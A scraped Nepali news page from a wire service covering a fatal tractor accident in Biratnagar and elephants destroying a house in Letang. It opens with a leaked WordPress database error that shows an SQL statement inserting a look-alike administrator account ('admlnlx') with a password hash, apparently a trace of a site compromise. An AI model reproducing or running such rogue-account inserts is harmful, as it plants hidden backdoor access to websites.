WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvreLi6eXzUyk9C1aLmbs2Q1WNRFlP.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:11:51', '', 'admlnlx', 'admlnlx')
उर्लाबारी ९मोरङ०, मंसिर २३ –
मोरङको विराटनगर–५ स्थित भित्री सडकखण्डमा आज बिहान ट्याक्टर दुर्घटना हुँदा चालकको मृत्यु भएको छ ।
को१त ६४९२ नम्बरको ट्याक्टर आफैँ अनियन्त्रित भई दुर्घटना हुँदा त्यसका चालक सुनसरी रामगञ्च बेलगछिया–८ बस्ने ३० वर्षीय उमेश उराउको मृत्यु भएको हो ।
दुर्घटनामा परेर गम्भीर घाइते भएका उराउको कोसी अञ्चल अस्पताल विराटनगरमा उपचारका क्रममा बिहान ८ बजे मृत्यु भएको जिल्ला ट्राफिक प्रहरी कार्यालय मोरङका प्रमुख प्रहरी निरीक्षक धनप्रसाद शिवाकोटीले जानकारी दिनुभयो ।
जङ्गली हात्तीले घर भत्काउँदा रु एक लाखको क्षति
मोरङको लेटाङ–भोगटेनी नगरपालिका–७ कमलपुरमा गएराति जङ्गली हात्तीले एउटा घरमा क्षति पु¥याएको छ ।
जङ्गलबाट निस्केका दुई वटा हात्तीले स्थानीय शेरमान लिम्बूको टिन र काठले बनेको घर भत्काई घरभित्र राखिएको अन्नपात नष्ट गरेको हो । घर भत्किदा लिम्बूको अन्दाजी रु एक लाख मूल्य बराबरको क्षति भएको छ । हात्तीलाई प्रहरी र स्थानीयवासी मिलेर राति नै जङ्गलतिर लखेटेका छन् । – रासस